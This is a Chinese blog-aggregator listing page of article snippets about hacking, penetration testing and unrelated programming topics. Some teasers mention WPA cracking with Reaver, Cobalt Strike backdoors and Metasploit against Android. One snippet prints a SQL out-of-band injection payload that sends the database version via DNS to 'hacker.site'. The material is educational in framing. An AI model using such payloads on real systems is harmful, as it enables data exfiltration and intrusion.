安全渗透—Hacker

[HackerRank] [haskell]刷题记录

Haskell功力太弱了,刷一下HackerRank上面的Haskell题目(同时在读Haskell函数式编程入门第二版),都记录在这个博客里面。
SakamataZ·2023-04-10 10:34

XSS的三种攻击及httponly---20200812

真实案例解释XSS的三种攻击XSS:hacker往HTML中注入恶意脚本,浏览器是无法区分脚本是被恶意注入的还是正常的页面脚本,所以恶意注入JavaScript脚本也拥有所有的脚本权限。
颖小李·2023-04-09 23:13

2023年黑客产业研究报告

第一章行业概况黑客一词来源于英文中的“hacker”,原本是指技术高超、熟练掌握计算机技术的人。但随着互联网的普及和网络犯罪的增加,黑客一词逐渐被人们所熟知,并带有了一定的负面含义。
资产信息网·2023-04-09 20:46

Cookie-Form型CSRF防御机制的不足与反思

今天看了https://hackerone.com/reports/26647有感。这个漏洞很漂亮,另外让我联想到很多之前自己挖过的漏洞和写过的程序,有感而发。
嘿丶小伙计·2023-04-09 10:39

2022牛客杭电多校dp+字符串题目汇总

文章目录牛客:第一场I.Chiitoitsu(期望dp)第二场K.LinkwithBracketSequenceI(括号序列dp)第二场L.LinkwithLevelEditor(线性dp)第三场H.Hacker
jangyi.·2023-04-09 03:34

Shell替换数组元素之间的间隔符号

Shell中的数组是这样表示的:arr=(1,2,3,4,5)它们数组元素的间隔符号为逗号,如果我相把逗号替换为加号:echo${arr//,/+}输出:1+2+3+4+5这个表达式是我在hackerrank
weixin_38168198·2023-04-09 01:36

HackerOne第二名白帽专访:业余挖洞,两年赚 40 万美金

本文讲的是HackerOne第二名白帽专访:业余挖洞,两年赚40万美金,你必须要体谅SeanMelia(meals),他在十万白帽黑客聚集的HackerOne社区只是位列第二名。
weixin_34054866·2023-04-09 01:24

HackerOne第二白帽:业余挖洞,两年赚 40 万美金 ----转

转;http://www.sohu.com/a/130054835_583123你必须要体谅SeanMelia(meals),他在十万白帽黑客聚集的HackerOne社区只是位列第二名。
dengdang7631·2023-04-09 01:45

调查了 12,000 名女性开发者发现,女性比男性更懂 Java!

近日,HackerRa
weixin_33724659·2023-04-08 23:00

程序媛报告:调查了 12,000 名女性开发者发现,女性比男性更懂 Java!

近日,HackerRa
CSDN 程序人生·2023-04-08 23:25

了不起的女性开发者:90后误选专业入对行,酷女孩霸榜开源NO.1

HackerRan2019年度女性开发者调查报告中指出,Z世代(1995-2009年间出生的人)的女性开发者们不仅学会编程的年龄逐渐提前,甚至在某些编程语言上比男性的表现更出色。
飞桨PaddlePaddle·2023-04-08 23:24

如何成为安全渗透工程师?

前言1/我是如何学习黑客和渗透?我是如何学习黑客和渗透测试的,在这里,我就把我的学习路线写一下,让新手和小白们不再迷茫,少走弯路,拒绝时间上的浪费!2/学习常见渗透工具的使用注意:这里绝对不是说的那些什么抓鸡啊、远控啊一些无脑软件,你觉得你用了那些软件后有什么?一丝虚荣心?还是成就感?不,你在别人大牛的眼里什么都不是,你还拿着别人玩烂了的东西到处一顿乱扫,所以你需要系统的学习,就算你说你时间不够,
不是程序媛ya·2023-04-08 13:58

2020-01-12-ARTS-一月第二周

layout:posttitle:ARTS-2020一月第二周subtitle:一月第二周ARTSdate:2020-01-12author:Maydayheader-img:img/post-bg-hacker.jpgcatalog
longxingxiu·2023-04-08 11:45

如何使用Reaver破解Wi-Fi网络的WPA密码

via:http://lifehacker.com/5873407/how-to-crack-a-wi+fi-networks-wpa-password-with-reaver译者:Mr小眼儿
Mr小眼儿·2023-04-08 00:53

黑客入门(超级详细版)

正派黑客依靠自己掌握的知识帮助系统管理员找出系统中的漏洞并加以完善,而邪派黑客则是通过各种黑客技能对系统进行攻击、入侵或者做其他一些有害于网络的事情,因为邪派黑客所从事的事情违背了《黑客守则》,所以他们真正的名字叫“骇客”(Cracker)而非“黑客”(Hacker
耿直学编程·2023-04-07 10:31

网络安全渗透测试的八个步骤(一)

一、明确目标1.确定范围:测试目标的范畴、ip、网站域名、内外网、检测帐户。2.确定标准:能渗入到何种程度,所花费的时间、能不能改动提交、能不能漏洞利用、这些。3.确定要求:web应用的漏洞、业务逻辑漏洞、工作人员管理权限管理漏洞、这些。二、信息收集1.方法:积极扫描仪,开放搜索等。2.开放搜索:使用百度搜索引擎得到:后台管理、未经授权网页页面、比较敏感url、这些。3.基础信息:IP、子网、网站
网安世纪小鹅NISP_CISP·2023-04-07 03:39

学习渗透测试,考CISP-PTE还是考NISP-PT证书呢?

两个证书都由中国信息安全测评中心颁发,CISP-PTE(注册信息安全渗透测试工程师),NISP-PT(国家信息安全水平考试渗透测试工程师),都属于渗透测试工程师认证。从证书认可度到含金量基本一致。
网安世纪小鹅NISP_CISP·2023-04-07 03:39

Pycharm使用指南【完整版】

✅作者简介:CSDN内容合伙人、阿里云专家博主、51CTO专家博主、新星计划第三季python赛道Top1个人主页:hacker707的csdn博客系列专栏:零基础入门篇个人格言:不断的翻越一座又一座的高山
hacker707·2023-04-07 01:11

安卓7.0以上无法抓包解决方案

系统以上就无法抓包了,使用VirtualXposed+JustTrustMe进行抓包是最简单的一种方式1、下载VirtualXposedapk,地址:https://github.com/android-hacker
HC2·2023-04-06 17:55

初识Python(注释、代码缩进、编码规范、标识符、变量)

✅作者简介:CSDN内容合伙人、阿里云专家博主、51CTO专家博主、新星计划第三季python赛道Top1个人主页:hacker707的csdn博客系列专栏:零基础入门篇个人格言:不断的翻越一座又一座的高山
hacker707·2023-04-06 06:26

Python搭建编程环境-安装Python3解释器

✅作者简介:CSDN内容合伙人、阿里云专家博主、51CTO专家博主、新星计划第三季python赛道Top1个人主页:hacker707的csdn博客欢迎大家订阅系列专栏:Python零基础入门篇个人格言
hacker707·2023-04-05 13:52

Python搭建编程环境-安装Pycharm开发工具

✅作者简介:CSDN内容合伙人、阿里云专家博主、51CTO专家博主、新星计划第三季python赛道Top1个人主页:hacker707的csdn博客欢迎大家订阅系列专栏:零基础入门篇个人格言:不断的翻越一座又一座的高山
hacker707·2023-04-05 13:52

cache的基本原理 和 多核cache的一致性

原文转载自知乎:cache的基本原理多核Cache一致性10张图打开CPU缓存一致性的大门另外一本很不错的书籍:MemoryBarriers:aHardwareViewforSoftwareHackers
wayyyy·2023-04-05 12:28

【安全测试】如何做好域名信息收集

作为专业的安全渗透测试人员,在项目开始时,一般都只有一个或一组域名,客户往往不会给你全部的有效域名(多数情况是他们自己都摸不透他们所有的域名)。
码同学软件测试·2023-04-05 12:06

第六届中科大信息安全大赛-hackergame2019小结

之前看群里郁师傅推荐了这个比赛,本着试试水的心理就报了这个比赛。不过因为学校程序设计周的原因,自己大部分时间都花在跟队友爆肝Qt版贪吃蛇就没怎么特别花时间去做。(这里稍稍抱怨一下,学校程序周设计不收python程序。于是本来用python的pygame库半天就能解决的问题我们硬生生拿MFC跟Qt做。。。当然,头天自学完Qt第二天就完成完整版贪吃蛇,心里还是挺骄傲的;最后一天熬夜给贪吃蛇加上ai功能
byc_404·2023-04-05 05:58

攻防世界 WEB mfw

这题考的是两个点:Git泄露和assert函数执行代码先说Git泄露,通过About发现该网站使用了Git,查看/.git目录发现确实存在泄露情况那么下载GitHacker工具查看源码pip3installGitHackergithacker
显哥无敌·2023-04-05 04:41

攻防世界mfw--详细笔记

打开之后发现有关于gif,php和bootstrap的信息,于是想到是不是又git源码地址栏后面加.githttp://61.147.171.105:61123/.git/发现存在git目录,使用kali的githacker
Catchfires·2023-04-05 04:02

msf对小米11进行安全渗透

作者:SwBack技术交流Q群:768493664文章在饭前编写,由于着急吃饭,所以排版比较乱环境配置工具型号接入方式kali2021桥接安卓手机小米11WIFIAndroidKillerV1.3.1.0apktools2.6.1实验过程中小米11未提示风险,(仅签名问题提示非小米应用商店app)但是功能实际都被拦截,无法获取敏感信息,如通话记录,短信等。当开启权限之后,信息被成功获取。如文章最下
SwBack·2023-04-05 03:06

围棋棋盘怎么编程python_python围棋_python围棋程序_python实现围棋ai - 云+社区 - 腾讯云...

进入研究生阶段后,跟随实验室的研究方向,未来的职业定位也随之改变,hacker梦渐行渐远.....但是python却从未离开过我,因为在研究深度学习中,python仍旧还是我的左膀右臂。
weixin_39610085·2023-04-04 18:36

推荐一些开源实用的安全渗透测试工具!

今天从安全渗透测试的角度,给大家推荐一些安全开源项目,涉及有安全漏洞靶场、渗透测试、安全工具、安全学习资料测等。(第五部分是重点)一、漏洞练习靶场1、WebGoa
测试开发技术·2023-04-04 11:13

七夕快乐,程序员浪漫周年纪念日

代码地址:GitHub-hackerzhou/Love:MylovestorywithMaryNee在线预览地址:OurLoveStory预览图:参考操作流程如下:1、拉取代码gitclonehttps
安逸的程序猿·2023-04-03 23:47

Python's Hardest Problem -- GIL

Oneofthefirstlong-formarticlesIeverpostedtothisblogwasapieceaboutPython’sGlobalInterpreterLock(GIL)entitled“Python’sHardestProblem”.Twoweeksago,itwaspostedtoHackerNewsandsatonthefrontpageforawhile
欧阳嘉·2023-04-03 22:32

kernel hacker修炼之道之内存管理-SLAB(创建SLAB高速缓存kmem_cache_create())

创建SLAB高速缓存kmem_cache_create()作者:李万鹏于北京borqs这篇主要讲解专用高速缓存的创建函数kmem_cache_create()的流程。kmem_cache_create()主要是建立的cache描述符,填充了其成员,设置cpulocalslab,设置外置slab描述符还是内置slab描述符,并没有分配slab块和对象。最终将cache描述符添加到cache_chai
iteye_6429·2023-04-03 21:42

TryHackMe-Ollie | HackerDog(boot2root)

Ollie臭名昭著的黑客狗OllieUnixMontgomery是一位伟大的红队员。至于发展…没那么多!有传言说,Ollie弄乱了服务器上的一些文件,以确保向后兼容性。在时间用完之前控制!端口扫描循例nmapWeb枚举进80,直接一个登录页面,循例看看源代码,顺便gobuster扫了一波没有什么获得太多信息回到登录页面,查看底部phpIPAM1.4.5,存在一个rce,这是通过sql注入写入文件导
Sugobet·2023-04-03 17:37

软件测试进阶之1——测试进阶方向

技术测试:耳熟能详的性能测试、自动化测试、接口测试、数据库测试、安全渗透测试、白盒测试、灰盒测试等等,任
Kobayasii·2023-04-03 15:24

小迪安全|第12天:SQL注入之简要SQL注入

目录每个数据库都对应一个网站想要得到数据,就必须知道是哪个数据库,哪个表,哪个列MySQL5.0以上是高版本,以下是低版本两个靶场:1.Sqlilabs2.忍者安全测试系统下载Sqlilabs:忍者安全测试系统的安装教程参考:忍者安全渗透系统
楚楪·2023-04-03 15:20

网络安全专家最爱用的9大工具

网络安全专家,即“ethicalhackers”,是一群专门模拟网络安全专家攻击,帮助客户了解自己网络的弱点,并为客户提出改进建议的网络安全专家。网络安全专家在工作中,通常会使用哪些工具和软件?
IT自学妹·2023-04-03 11:56

153.网络安全渗透测试—[Cobalt Strike系列]—[生成hta/exe/宏后门]

我认为,无论是学习安全还是从事安全的人多多少少都会有些许的情怀和使命感!!!文章目录一、后门简介1、hta后门2、exe后门3、宏病毒后门二、生成后门并测试0、测试环境1、生成hta后门并测试2、生成exe后门并测试3、生成宏病毒后门并测试一、后门简介1、hta后门(1)HTA简介:HTA是HTMLApplication的缩写(HTML应用程序),是软件开发的新概念,直接将HTML保存成HTA的格
qwsn·2023-04-03 09:07

Maxwell与Canal

对比抉择Canal(是阿里的一个中间件组件)GitHub-alibaba/canal:阿里巴巴MySQLbinlog增量订阅&消费组件(服务端,需要一个客户端来配合)https://github.com/Hackeruncle
AllenGd·2023-04-02 23:04

SQL带外通道注入

其他数据库未测试DNS注入selectload_file(concat('\\',version(),'.hacker.site\a.txt'));se
CMDY10086·2023-04-02 19:01

网络安全专家 最爱用的 9 大工具

网络安全专家,即“ethicalhackers”,是一群专门模拟网络安全专家攻击,帮助客户了解自己网络的弱点,并为客户提出改进建议的网络安全专家。网络安全专家在工作中,通常会使用哪些工具和软件?
开源Linux·2023-04-02 17:56

网络安全专家最爱用的9大工具

网络安全专家,即“ethicalhackers”,是一群专门模拟网络安全专家攻击,帮助客户了解自己网络的弱点,并为客户提出改进建议的网络安全专家。网络安全专家在工作中,通常会使用哪些工具和软件?
GLAB-Mary·2023-04-02 17:23

MySQL安装部署

原作者连接:https://github.com/Hackeruncle/MySQL/blob/master/MySQL%205.7.11%20Install.txt致敬J哥1.解压及创建目录[root
guaren2009·2023-04-02 15:16

【汇总】人脸关键点检测

zhuanlan.zhihu.com/p/429681172、https://blog.csdn.net/lgh0824/article/details/85070490数据集:1、https://blog.csdn.net/hacker_long
咖啡味儿的咖啡·2023-04-02 14:51

2021-02-24

网络安全渗透工具------NmapNmap是开源的端口扫描工具,可以用来进行系统安全加固,通过对目标系统进行扫描得出目标系统开放了哪些端口,关闭不必要的端口,防止黑客入侵利用。
养蛇的农夫·2023-04-01 17:41

2022第六届蓝帽杯初赛writeup

2022第六届蓝帽杯初赛writeupPWNEscapeShellcodeMISCdomainhackerdomainhacker2电子取证手机取证_1手机取证_2计算机取证_1计算机取证_2计算机取证
小蓝同学`·2023-04-01 15:23

还在为追不到女神发愁吗?破解舔狗日记一键生成,让你轻松1秒5舔~

我们用ResourceHacker试着获取一些破解思路ResourceHacker无法直接反编译获得源码,但依然为我们提供了破解的线索,通过解析出的经典软盘图标,可以确定舔狗日记.exe是Py
zhaoolee·2023-04-01 06:26

剑指offer题解

剑指offer刷题记录前言我的博客:bdsnake.top推荐链接:某卷王的github题解:https://github.com/hackeryang/SwordToOffer牛客网剑指offer:https
-BDsnake-·2023-03-31 23:07

(转) Deep Reinforcement Learning: Pong from Pixels

AndrejKarpathyblogAboutHacker'sguidetoNeuralNetworksDeepReinforcementLearning:PongfromPixelsMay31,2016ThisisalongoverdueblogpostonReinforcementLearning
a1424262219·2023-03-31 21:11

149.网络安全渗透测试—[Cobalt Strike系列]—[HTTP Beacon重定器/代理服务器/流量走向分析]

我认为,无论是学习安全还是从事安全的人多多少少都会有些许的情怀和使命感!!!文章目录一、CobaltStrike重定器1、CobaltStrike重定器简介2、重定器用到的端口转发工具二、cobaltstrike重定器实验1、实验背景2、实验过程3、流量分析一、CobaltStrike重定器1、CobaltStrike重定器简介(1)重定器简介“重定器”是一个在“cobaltstrike”服务器和
qwsn·2023-03-31 17:47
上一页 10 11 12 13 14 15 16 17 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他